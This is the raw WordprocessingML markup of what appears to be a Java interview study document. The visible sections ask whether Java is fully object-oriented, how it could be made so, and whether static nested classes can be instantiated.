          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sandboxed environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which limits the potential for security breaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71139BA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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1847A45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Ranking (Most to Least Secure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F77B66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ython</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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Adds some security improvements over C (like exceptions and RAII), but still inherits the risk of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manipulation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE7969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Least secure due to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and lack of built-in error checking, which makes it prone to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>security vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E886A1B" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B9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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BC0C25" w14:textId="7564A513" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="00444CA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc197867246"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Is Java 100% object oriented</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="4D12B237" w14:textId="1B6CA0CC" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="0001168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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31323427"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Considered Object-Oriented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0793E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 Wrapping data and methods together into a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395339A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olymorphism: Objects can take on many forms through method overriding or interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1615D9C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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3278F8DB"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Not 100% Object-Oriented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EFB589"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itive Data Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639E3E9E" w14:textId="77777777" w:rsidR="006C2A17"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has primitive data types like int, char, float, double, boolean, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788EC02F" w14:textId="4B56FFC0" w:rsidR="007C3B62"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692E1F" w14:textId="77777777"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itive type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F190064" w14:textId="031FCB40"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bject type (Wrapper class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA77E59" w14:textId="77777777"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Methods and Variables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51007D6D" w14:textId="77777777" w:rsidR="00B93019"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35A993E"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5B59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7053CE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FF115C"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9D847"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0DFAFE54"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FDFE62" w14:textId="4D730CDD"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B38ECD6"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660EF6A0" w14:textId="77777777" w:rsidR="009F497A"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEAB36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DABD532"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mostly object-oriented but not 100% object-oriented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565DD26"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primitive types and static methods break the pure OOP paradigm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395ADF01" w14:textId="47196C8B" w:rsidR="007C3B62"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6" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7682D2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C85A59A"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Pr="00CE4B95"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47" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2649A1A2" w14:textId="1845A622" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="008977EC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc197867247"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can we make java 100% object oriented</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="292EB37D" w14:textId="461B378E" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="001301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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>100% object-oriented</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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liminate Primitive Data Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E2CB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78766348"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pure object-oriented languages like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everything is an object, including numbers and characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CBB25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is can be achieved by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wrapper classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for primitives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5185622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becomes Integer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0512AAE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r becomes Character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3833907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 becomes Double</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D39638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would involve </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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46971EC"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using primitive int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602D4269" w14:textId="160D2C20"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haracte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char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF505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Java uses </w:t>
      </w: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48" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A5DA74"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move Static Methods and Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBA6584"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mbers (variables and methods) are tie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2897784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static methods and variables altogether.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EF129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using static methods, you would need to call methods on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instances of classes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA904E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2E91F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this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA35AE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E28A16"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1D83CBE"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F9F1B3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E2FC4B"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FF5ACD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449CEE" w14:textId="5694500E"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19501F9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the static keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB6AF8"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6F15"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393AF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96FFE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E3036D"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1C073847"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F5D7B" w14:textId="3C2CB902"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01591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every </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> would need an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of MyClass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C3F91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49" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40379523"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reat Constructors as Objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6138F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1567443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100% object-oriented, you could treat </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constructors as objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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where everything is an object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0095B2AE"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F46E3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move the null Keyword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013505E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null keyword represents the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>absence of an object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java, which means Java’s design recognizes the concept of "nothing," breaking the idea that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>everything is an object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2F5C2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35EFD47F"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D63B4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Changes to Make Java 100% Object-Oriented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ADE5B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iminate Primitive Data Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Static Members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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at Constructors as Objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5122BBF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istic Consideration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C92C57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ile making Java fully object-oriented would be an interesting exercise in OOP purity, it would introduce significant </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>performance overheads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AEE11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primitives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FE0E4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ed for managing more objects (even simple integers or booleans)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D770C0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CE4B95"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB82AF9" w14:textId="668D7B7D" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="00677441">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc197867248"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we create objects of static class</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="78BDEBB8" w14:textId="41F85FEE" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="00472E7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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> typically refers to 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e., a class declared as static inside another class). Th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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C4D8E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Static Classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC28E60"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71DD055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s a class that is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>declared static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside another class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4723B0C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reate an object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0F66A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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5480AEAD" w14:textId="4BD0C5CD"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n We Create Objects of a Static Nested Class?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B9FC6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Theme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>you can create objects of a static class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (nested static class) in Java. Since a static nested class is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>independent of the outer class instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, it can be instantiated directly using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65143E20"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6" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A03B7F"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atic Nested Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520BFB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1E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2625D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6133A"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static nested class"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C706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14BE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9BC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84E391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1398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object of the static nested class without an instance of OuterClass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40394B9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nested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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711574E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nested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static nested class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32EA0E"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BB51F1" w14:textId="541DB1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0CEC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20D9655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NestedClass is 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nside OuterClass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F11334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n instance of StaticNestedClass </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>without</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> creating an instance of OuterClass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E872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57" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D89C831"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Non-Static Inner Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D1DAD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22C5382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instantiated without an instance of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030920E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only </w:t>
      </w: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of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103F9F0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73C56F7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both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instance and static members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2919041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Non-Static Inner Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB33C12"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14305D"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9057F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BAC6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non-static inner class"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C62714C"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11DB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FDDCA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06F77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4F7EC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 need an instance of OuterClass to create an instance of the inner class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC01C4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ou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p>
    <w:p w14:paraId="470A4E7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inner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u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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717161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inner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non-static inner class</w:t>
      </w:r>
    </w:p>
